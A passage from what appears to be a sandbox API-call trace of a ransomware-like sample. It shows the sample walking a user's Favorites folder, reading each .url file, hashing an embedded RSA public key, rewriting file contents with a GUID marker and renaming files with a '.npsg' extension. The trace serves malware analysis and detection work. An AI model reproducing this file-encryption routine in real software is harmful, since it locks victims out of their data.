lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0237.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0237.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0237.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b83cd0 [0237.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0237.751] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0237.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.751] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.751] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.751] CloseHandle (hObject=0x644) returned 1 [0237.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d7c0 [0237.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b83cd0 [0237.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d7c0 | out: hHeap=0x620000) returned 1 [0237.754] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.npsg")) returned 1 [0237.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.755] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0237.756] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0237.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0237.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0237.756] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned=".url" [0237.757] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.757] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=133) returned 1 [0237.757] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.760] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.760] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.761] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.761] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x85, lpOverlapped=0x0) returned 1 [0237.761] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.761] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.761] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.761] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0237.763] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.763] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.763] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.763] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.763] GetLastError () returned 0x0 [0237.763] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.763] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0237.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.763] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.763] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.763] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0237.763] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0237.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409488 [0237.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006e0 [0237.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x34094d0 [0237.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006f8 [0237.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400728 [0237.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400788 [0237.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400740 [0237.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0237.764] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400728 | out: hHeap=0x620000) returned 1 [0237.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400740 | out: hHeap=0x620000) returned 1 [0237.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400788 | out: hHeap=0x620000) returned 1 [0237.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400788 [0237.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0237.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400740 [0237.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400728 [0237.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0237.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0237.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0237.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400740 | out: hHeap=0x620000) returned 1 [0237.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400728 | out: hHeap=0x620000) returned 1 [0237.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400788 | out: hHeap=0x620000) returned 1 [0237.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0237.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.765] GetCurrentThreadId () returned 0x5b4 [0237.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b82948 [0237.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0237.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.766] GetCurrentThreadId () returned 0x5b4 [0237.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0237.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0237.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0237.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400788 [0237.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400728 [0237.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0237.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0237.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0237.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400740 [0237.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0237.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0237.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400710 [0237.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0237.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34007a0 [0237.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0237.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0237.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400770 [0237.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400758 [0237.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34007b8 [0237.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400758 | out: hHeap=0x620000) returned 1 [0237.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400758 [0237.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400770 | out: hHeap=0x620000) returned 1 [0237.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0237.768] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.769] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.769] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.769] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.769] CloseHandle (hObject=0x644) returned 1 [0237.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393a30 [0237.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3b83cd0 [0237.770] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.npsg")) returned 1 [0237.772] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0237.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0237.773] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned=".url" [0237.773] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.773] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=133) returned 1 [0237.773] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.776] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.776] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.777] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x85, lpOverlapped=0x0) returned 1 [0237.777] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.777] lstrlenA (lpString="-----BEGIN PUBLIC 